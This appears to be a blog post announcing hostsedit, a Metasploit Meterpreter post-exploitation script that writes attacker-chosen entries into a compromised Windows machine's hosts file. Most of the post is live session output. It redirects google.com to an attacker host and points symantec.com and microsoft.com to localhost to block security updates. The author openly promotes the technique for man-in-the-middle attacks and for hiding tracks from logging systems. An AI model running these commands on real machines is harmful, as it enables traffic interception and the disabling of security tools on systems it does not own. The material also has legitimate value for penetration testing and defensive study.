I recently commited to the Metasploit SVN the hostsedit.rb script, the main purpose of this script is for the adding of DNS name mappings in to the hosts file on a windows target host. The main purpose of this script is to redirect traffic destined for specific records to and IP address of the attacker choosing, very useful for performing Man In the Middle attacks or for redirecting traffic to managements or logging systems to localhost for covering ones track. To see the options available in the script you simply run it with out any option:

meterpreter > run hostsedit
This Meterpreter script is for adding entries in to the Windows Hosts file.
Since Windows will check first the Hosts file instead of the configured DNS Server
it will assist in diverting traffic to the fake entry or entries. Either a single
entry can be provided or a series of entries provided a file with one per line.
OPTIONS:
    -e <opt>  Host entry in the format of IP,Hostname.
    -h        Help Options.
    -l <opt>  Text file with list of entries in the format of IP,Hostname. One per line.
Example:
run hostsedit -e 127.0.0.1,google.com
run hostsedit -l /tmp/fakednsentries.txt

As it can be seen from the output above the 2 main option of this script is the addition of a single record where the IP and domain name are separated by a comma or the use of a file where each record to be added is one per line in the same format this permits the setting of hosts depending on the information gathered from the host or to be used in an automatic fashion where the script can be set in msfconsole to modify several clients as they connect to it. The script also has the capability in the case of Windows Vista target hosts to detect if UAC (User Access Control) is enabled since this will prevent any modification of the target hosts file.

Example of adding a single record and point google.com to another host in the network:

meterpreter > execute -H -c -f "cmd /c ping google.com" -i
Process 3544 created.
Channel 2 created.
Pinging google.com [74.125.127.100] with 32 bytes of data:
Reply from 74.125.127.100: bytes=32 time=238ms TTL=239
Reply from 74.125.127.100: bytes=32 time=224ms TTL=239
Reply from 74.125.127.100: bytes=32 time=256ms TTL=239
Reply from 74.125.127.100: bytes=32 time=278ms TTL=239
Ping statistics for 74.125.127.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 224ms, Maximum = 278ms, Average = 249ms
meterpreter > 
meterpreter > run hostsedit -e 192.168.1.120,google.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts.back
[*] Adding Record for Host google.com with IP 192.168.1.120
[*] Clearing the DNS Cache
meterpreter > execute -H -c -f "cmd /c ping google.com" -i
Process 2888 created.
Channel 3 created.
Pinging google.com [192.168.1.120] with 32 bytes of data:
Reply from 192.168.1.120: bytes=32 time=1ms TTL=64
Reply from 192.168.1.120: bytes=32 time=2ms TTL=64
Reply from 192.168.1.120: bytes=32 time=1ms TTL=64
Reply from 192.168.1.120: bytes=32 time=2ms TTL=64
Ping statistics for 192.168.1.120:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 2ms, Average = 1ms
meterpreter >

As it can be seen from the output the script first makes a backup of the hosts file and then proceeds to append the record to the end of the hosts file and flushes the DNS cache to make sure that no previous DNS entries to the domain or host we want to redirect are not in the targets cache. Here we see the command but for redirecting 2 entries:

msf exploit(handler) > cat /tmp/fakednsentries.txt
[*] exec: cat /tmp/fakednsentries.txt
127.0.0.1,symantec.com
127.0.0.1,microsoft.com
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run hostsedit -l /tmp/fakednsentries.txt
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts.back
[*] Adding Record for Host symantec.com with IP 127.0.0.1
[*] Adding Record for Host microsoft.com with IP 127.0.0.1
[*] Clearing the DNS Cache
meterpreter > execute -H -c -f "cmd /c ping symantec.com" -i
Process 3296 created.
Channel 8 created.
Pinging symantec.com [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time=2ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 2ms, Average = 0ms
meterpreter >

Shell is Only the Beginning

Hostsedit Meterpreter Script